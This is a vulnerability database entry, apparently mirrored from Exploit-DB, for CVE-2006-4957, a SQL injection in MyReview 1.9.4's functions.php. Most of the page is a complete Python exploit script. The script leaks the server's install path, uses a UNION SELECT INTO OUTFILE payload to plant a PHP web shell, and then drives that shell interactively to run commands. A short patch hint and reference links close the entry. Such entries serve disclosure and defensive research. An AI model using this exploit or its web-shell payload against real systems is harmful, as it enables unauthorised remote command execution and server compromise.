https://www.exploit-db.com/exploits/2397
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-398
MyReview 'functions.php' SQL Injection Vulnerability

Vulnerability ID: 1111078
Vulnerability type: SQL injection
Published: 2006-09-19
Updated: 2006-09-25
CVE: CVE-2006-4957
CNNVD: CNNVD-200609-398
Platform: PHP
CVSS score: 7.5

Vulnerability details
A SQL injection vulnerability exists in the GetMember function in functions.php in MyReview 1.9.4. The function pastes the submitted email address into the query string without escaping or parameterization, so a remote attacker can execute arbitrary SQL commands via the email parameter of Admin.php.
Exploit
# MyReview 1.9.4 SQL Injection exploit
#
#
# http://myreview.lri.fr/
#
# in functions.php starting from line 382
# ............
# function GetMember ($email, $db, $mode="array")
# {
#     $query = "SELECT * FROM PCMember WHERE email = '$email'" ;
#     $result = $db->execRequete ($query);
# ..........
#
# $email is not checked before used into $query
#
# for patch
#
# 1. add "$email=addslashes(trim($email));" before $query
# 2. use something else, very buggy script
#
# by STILPU (dmooray[a lu']gmail.com)
#
# Python 2 script (httplib/urllib/urlparse/raw_input). Flow:
#   1. POST email="'" so the resulting SQL error, with PHP warnings shown,
#      leaks the absolute install path,
#   2. POST a UNION SELECT ... INTO OUTFILE payload that writes a PHP shell
#      under FILES/ (must be writable by the MySQL user),
#   3. loop, sending commands to that shell via ?cmd=.
import httplib, urllib, re, urlparse, sys

def usage():
    print """
MyReview 1.9.4 SQL Injection exploit
Usage: python exploit.py http://target/pathtomyreview/
Requires warnings to be displayed so we can get the localpath and FILES/ to be writable
by STILPU (dmooray[a lu']gmail.com)
"""
    sys.exit(1)

def getlocalpath(server):
    # A lone quote breaks the query; the error page then contains the
    # absolute path of the script, which is scraped with a regex.
    params = urllib.urlencode({'email': '\'', 'motDePasse': 'a', 'ident': 'Log in'})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    con = httplib.HTTPConnection(server)
    con.request("POST", path + "Admin.php", params, headers)
    resp = con.getresponse()
    data = resp.read()
    try:
        localpath = re.search('>/.*B', data[0:10000]).group().replace('>', '', 1).replace('B', '', 1)
    except Exception:
        print "Exploit failed: didn`t manage to get localpath"
        sys.exit(1)
    return localpath

def sendshell(server):
    # The UNION row is padded to the column count of PCMember (five in this
    # payload); MySQL writes it to FILES/STILPU.php via INTO OUTFILE and the
    # trailing '#' comments out the closing quote the application appends.
    shell = "'<?php error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); /*'"
    sql = "' union select " + shell + ",0,0,0,'*/ ?>' into outfile '" + getlocalpath(server) + "FILES/STILPU.php' from PCMember#"
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    params = urllib.urlencode({'email': sql, 'motDePasse': 'a', 'ident': 'Log in'})
    con = httplib.HTTPConnection(server)
    con.request("POST", path + "Admin.php", params, headers)

def sendcmd(server):
    # Interactive loop against the dropped shell; spaces become '+' for the query string.
    while 1:
        try:
            cmd = raw_input('sh$ ')
            cmd = cmd.replace(" ", "+")
            con = httplib.HTTPConnection(server)
            con.request("GET", path + "FILES/STILPU.php?cmd=" + cmd)
            resp = con.getresponse()
            data = resp.read()
            if (cmd == "exit" or cmd == "quit"): break
            print data
        except KeyboardInterrupt: break

if __name__ == '__main__':
    if len(sys.argv) < 2:
        usage()
    else:
        url = sys.argv[1]
        url = urlparse.urlsplit(url)
        target = url[1]   # host[:port]
        path = url[2]     # path to the MyReview install, with trailing slash
        sendshell(target)
        sendcmd(target)
# milw0rm.com [2006-09-19]
References
Source: XF, name: myreview-functions-sql-injection(29029), link: http://xforce.iss.net/xforce/xfdb/29029
Source: BID, name: 20105, link: http://www.securityfocus.com/bid/20105
Source: VUPEN, name: ADV-2006-3716, link: http://www.frsirt.com/english/advisories/2006/3716
Source: SECUNIA, name: 21991, link: http://secunia.com/advisories/21991
Source: MILW0RM, name: 2397, link: http://milw0rm.com/exploits/2397